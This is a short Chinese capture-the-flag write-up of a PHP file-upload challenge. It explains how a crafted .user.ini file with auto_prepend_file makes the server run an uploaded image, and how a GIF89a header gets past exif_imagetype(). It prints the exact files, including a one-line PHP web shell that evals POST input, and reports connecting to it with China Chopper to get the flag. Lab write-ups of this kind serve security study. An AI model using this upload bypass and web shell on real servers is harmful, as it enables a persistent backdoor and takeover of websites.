知识点:
-
利用.user.ini上传\隐藏后门
.user.ini实际上就是一个可以由用户“自定义”的php.ini,我们可以自定义除了PHP_INI_SYSTEM以外的模式,在执行php代码之前,系统会对.user.ini先做一个执行,然后才执行其他的php文件。利用.user,ini先执行auto_prepend_file函数,auto_prepend_file表示在php程序加载第一个php代码前加载的php文件,也就是先加载了a.jpg里面的文件,即一句话木马。
使用条件:
(1)服务器脚本语言为PHP
(2)对应目录下面有可执行的php文件
(3)服务器使用CGI/FastCGI模式参考链接:添加链接描述
-
绕过exif_imagetype()
利用GIF89a文件头绕过
复现:
构建文件.user.ini:
GIF89a
auto_prepend_file=a.jpg
a.jpg:
GIF89a
<script language='php'> @eval($_POST['pass']);</script>
依次上传:
看到dir,构造链接:
http://bf160532-e4f7-440c-ad96-054b826a30b1.node3.buuoj.cn/uploads/adeee0c170ad4ffb110df0cde294aecd/index.php
菜刀连接,得到flag